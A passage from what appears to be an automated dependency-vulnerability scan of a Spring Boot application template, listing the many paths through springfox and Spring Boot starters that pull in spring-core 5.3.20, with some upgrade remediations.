  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
